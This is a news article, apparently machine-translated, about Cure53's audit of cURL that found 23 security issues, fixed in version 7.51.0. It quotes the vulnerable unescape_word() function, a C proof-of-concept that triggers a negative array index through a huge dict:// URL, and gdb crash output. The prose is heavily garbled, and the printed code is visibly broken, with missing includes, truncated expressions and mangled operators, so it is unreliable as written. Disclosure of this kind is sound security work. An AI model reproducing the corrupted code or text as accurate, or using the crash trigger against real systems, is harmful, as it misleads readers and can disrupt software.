Note, the cURL of the vulnerability nor less-vulnerability warning-the black bar safety net

! [](/Article/UploadPic/2016-12/201612625228430. png? www. myhack58. com)
Security expert on cURL conducted an audit that found dozens of security vulnerabilities in the latest version has been fixed.
cURL surely we are not unfamiliar, it is an open source command-line tool and library that supports a variety of protocols to transfer data. cURL is now the application is quite extensive, including network devices, printers, smartphones, and even some Internet of things devices such as cars.
Active audit
Not long ago, the cURL developers, Mozilla employees Daniel Stenberg please Mozilla Secure Open Source(SOS)project of the cURL for a security audit.
“I give the Mozilla Secure Open Source project conducted a Safety Audit. This project is funded by the Mozilla looking for third-party companies together to participate in, and ultimately pay for. Involved in the audit of the company’s named Cure53 it.” Very well in the blog writes.“ The reason I apply for the audit is because recently I feel there are some safety-related issues, I think we in the Security aspects may be lacking, so I want to let the experts check it.”
Cure53 of 5 experts on the cURL for a period of 20 days of audit and found a total of 23 security issues.
Audit results
These security issues, 9 is a security vulnerability. Expert combines 2 of which are security vulnerabilities–one of which is classified as“plain bugs”, because in a practical attack scenarios for use will be very difficult. In addition, the audit found. 4 high-risk vulnerabilities and 4 medium-risk vulnerabilities.
High-risk vulnerability vulnerability number CVE-2016-8617, CVE-2016-8619, CVE-2016-8622 and CVE-2016-8623。 These are remote execution vulnerability.
For example the following vulnerabilities:
CRL-01-014 unescape_word()integer overflow resulting in a negative number of the array index of the high-risk）
dict. c unescape_word()function there is the following code:
static char *unescape_word(struct Curl_easy *data, const char *inputbuff) { char *newp; char *dictp; char *ptr; int len; char ch; int olen=0; newp = curl_easy_unescape(data, inputbuff, 0, &len); if(! newp)return NULL; dictp = malloc(((size_t)len)2 + 1); / add one for terminating zero / if(dictp) { / According to RFC2229 section 2.2, these letters need to be escaped with \[letter] */ for(ptr = newp; (ch = *ptr) != 0; ptr++) { if((ch 32) || (ch == 127) || (ch == '") || (ch== ‘"’) || (ch== '\')) { dictp[olen++] = '\'; } dictp[olen++] = ch; } dictp[olen]=0; }free(newp); return dictp; }
Obviously, len than pow(2,31)is small, but the output can be expanded to twice the size, that is to say when the olen is the value of INT_MAX, The can be increased. This will lead to signed integer overflow.
Since olen has been used as an array index, a negative array index will point to Unallocated memory.
To verify the vulnerability, you can at 6GB or more of free Memory 64-bit computers run the following code. This test will get a more than 1GB long the dict:// URL.
#include #include #include #include #include int main(int argc, char *argv[]){ char *dicturl = malloc(23 + (1ULL if (! dicturl) errx(1, “malloc”); strcpy(dicturl, “dict://localhost/MATCH:”); memset(dicturl + 23, ‘"’, (1ULL dicturl[23 + (1ULL CURL *hnd = curl_easy_init(); curl_easy_setopt(hnd, CURLOPT_URL, dicturl); free(dicturl); curl_easy_setopt(hnd, CURLOPT_NOPROGRESS, 1L); CURLcode ret = curl_easy_perform(hnd); curl_easy_cleanup(hnd); return (int)ret;}
Running will cause the following crash information:
$ gdb ./ negative_dict_url… runStarting program: […][…]Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b6975b in unescape_word (data=0x63a0b0, inputbuff=0x7fffb0fca017 ‘"’ …) at dict. c:116116 dictp[olen++] = '\';(gdb) x/1i $pc=> 0x7ffff7b6975b word+170>: mov(gdb) print/x $rax$1 = 0x7ffdf0dba010(gdb) print/x dictp$2 = 0x7ffe70dba010(gdb) print olen$3 = -2147483647
But in fact, the audit report mentioned that the cURL library the overall security and robustness are very good.
Also please do not worry, the new version of cURL has been on the line, 7.51. 0 version fixes a total of 11 vulnerabilities, 7 of which are by Cure53 the audit team found, the other vulnerability is by Luật Nguyễn, Christian Heimes and Fernando Muñoz.
Stenberg pointed out that cURL is a very commonly used software, and therefore, the audit for the user is of great significance.
“Since the curl is the world’s most commonly used software, and therefore the curl if there is a problem may be of a variety of tools, equipment, applications resulting in a significant impact. We don’t want that kind of thing.”